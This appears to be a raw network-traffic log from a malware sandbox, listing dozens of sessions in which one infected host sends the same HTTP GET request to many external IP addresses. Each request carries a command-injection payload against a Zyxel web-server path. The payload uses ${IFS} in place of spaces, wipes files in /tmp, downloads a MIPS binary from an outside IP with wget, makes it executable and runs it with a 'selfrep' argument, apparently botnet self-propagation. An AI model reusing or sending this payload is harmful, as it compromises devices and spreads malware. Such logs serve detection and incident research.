                                            Jan 14, 2024 15:50:33.310915947 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2631192.168.2.2358540210.168.97.255443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:33.310940981 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2632192.168.2.2344724200.1.85.119443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:33.310993910 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2633192.168.2.2335938176.151.145.182443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:33.311005116 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2634192.168.2.23590328.91.187.56443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:33.311026096 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2635192.168.2.2337172129.93.183.143443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:33.311067104 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2636192.168.2.2351360223.154.161.142443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:33.311072111 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2637192.168.2.2345730169.212.175.206443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:33.311101913 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2638192.168.2.2348768201.254.52.69443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:33.311142921 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2639192.168.2.235168472.119.100.78443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:33.311182022 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2640192.168.2.233652463.146.237.20443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:33.311208010 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2641192.168.2.234269038.137.59.87443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:33.311239958 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2642192.168.2.2338614201.202.248.178443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:33.311263084 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2643192.168.2.2359260185.137.80.205443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:33.311296940 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2644192.168.2.234891662.83.130.112443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:33.311336994 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2645192.168.2.2347066217.142.7.63443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:33.311372995 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2646192.168.2.233754666.91.247.185443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:33.311393023 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2647192.168.2.2349248181.228.158.18443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:33.311420918 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2648192.168.2.235123873.22.107.255443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:33.311451912 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2649192.168.2.2357436166.148.20.142443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:33.311459064 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2650192.168.2.2359974159.101.198.18443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:33.311475992 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2651192.168.2.2346286133.44.94.124443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:33.311487913 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2652192.168.2.2357104191.240.67.97443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:33.311515093 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2653192.168.2.2333868183.253.115.215443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:33.311518908 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2654192.168.2.235276225.56.226.96443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:33.311553955 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2655192.168.2.2343052157.89.49.6443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:33.311609983 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2656192.168.2.2336844213.157.78.30443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:33.311625004 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2657192.168.2.2350598211.94.49.27443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:33.311654091 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2658192.168.2.234727868.173.235.60443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:33.311655998 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2659192.168.2.2356144203.181.127.20443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:33.311695099 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2660192.168.2.2338758212.124.167.12443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:33.311724901 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2661192.168.2.235990820.73.202.2443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:33.311773062 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2662192.168.2.2334078133.78.34.35443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:33.311805010 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2663192.168.2.2338378172.82.65.165443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:33.311821938 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2664192.168.2.2338472183.16.227.122443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:33.311858892 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2665192.168.2.236049443.141.229.52443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:33.311866999 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2666192.168.2.233865670.89.36.15443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:33.311908007 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2667192.168.2.2339234131.168.90.154443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:33.311935902 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2668192.168.2.234684614.202.185.234443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:33.311958075 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2669192.168.2.2357952128.31.156.115443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:33.312010050 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2670192.168.2.234233642.55.134.141443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:33.312046051 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2671192.168.2.2351350171.3.134.217443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:33.312073946 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2672192.168.2.2333288115.26.68.168443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:33.312113047 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2673192.168.2.234228858.217.122.184443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:33.312140942 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2674192.168.2.2346686142.183.199.99443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:33.312160015 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2675192.168.2.235593699.48.10.219443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:33.312184095 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2676192.168.2.2355566163.51.91.185443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:33.312235117 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2677192.168.2.2350738147.219.222.111443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:33.312258959 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2678192.168.2.2348368216.226.110.31443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:33.312316895 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2679192.168.2.2345092170.234.252.72443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:33.312335014 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2680192.168.2.233611013.79.160.219443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:33.312376022 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2681192.168.2.2352528202.173.167.152443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:33.312393904 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2682192.168.2.2344142141.94.149.106443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:33.312422991 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2683192.168.2.2333048114.127.204.188443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:33.312443018 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2684192.168.2.2352924131.11.27.184443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:33.312494040 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2685192.168.2.235918218.25.46.54443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:33.314142942 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2686192.168.2.2335400147.134.71.18443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:33.314515114 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2687192.168.2.235616847.212.57.70443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:33.314639091 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2688192.168.2.2352250181.12.32.4443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:33.314870119 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2689192.168.2.233921089.64.173.46443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:33.315186977 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2690192.168.2.2351650158.132.143.82443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:33.315222979 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2691192.168.2.235674668.138.8.174443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:33.315757990 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2692192.168.2.2346064195.11.43.174443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:33.315788984 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2693192.168.2.235295025.131.52.10443
                                            TimestampBytes transferredDirectionData
